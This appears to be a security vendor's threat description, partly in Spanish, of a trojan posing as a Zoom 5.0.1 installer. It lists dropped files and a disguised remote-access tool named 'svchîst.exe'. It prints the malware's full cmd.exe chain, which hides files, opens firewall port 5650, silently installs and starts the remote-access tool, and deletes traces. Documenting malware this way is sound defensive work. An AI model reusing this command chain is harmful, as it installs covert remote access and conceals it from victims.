Trojan.Win32.ZAPIZ.THA

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Agrega las carpetas siguientes:

• %User Temp%\$inst

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Infiltra los archivos siguientes:

• %User Temp%\$inst\2.tmp
• %User Temp%\$inst\temp_0.tmp - Deleted afterwards
• %System%\drivers\install.exe - Detected as Trojan.Win32.ZAPIZ.THB
• %System%\drivers\ssleay32.dll
• %System%\drivers\libeay32.dll
• %System%\drivers\svchîst.exe - Detected as HackTool.Win32.RADMIN.GL
• %User Temp%\Zoom Meetings\5.0.1\setup.exe
• %User Temp%\$inst\0001.tmp - Deleted afterwards
• %User Temp%\Zoom Meetings\5.0.1\reg.exe
• %System%\idfgvgjnghcdfb.reg

Agrega los procesos siguientes:

• "%System%\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
• "%User Temp%\Zoom Meetings\5.0.1\setup.exe"
• "%User Temp%\Zoom Meetings\5.0.1\reg.exe" shortcut "%Application Data%\Zoom\bin\Zoom.exe" "~$folder.desktop$" "Start Zoom"
• "%System%\cmd.exe" /c attrib -h -s -r "%User Temp%\Zoom Meetings\5.0.1\*.*"
• "%System%\cmd.exe" /c RMDIR /s/q "%User Temp%\Zoom Meetings"
• "%System%\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1" /f
• "%System%\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Robo de información

Recopila los siguientes datos:

• Username
• Computer Name

Otros detalles

Hace lo siguiente:

• Executes the following command to open the following port:
  
  • netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650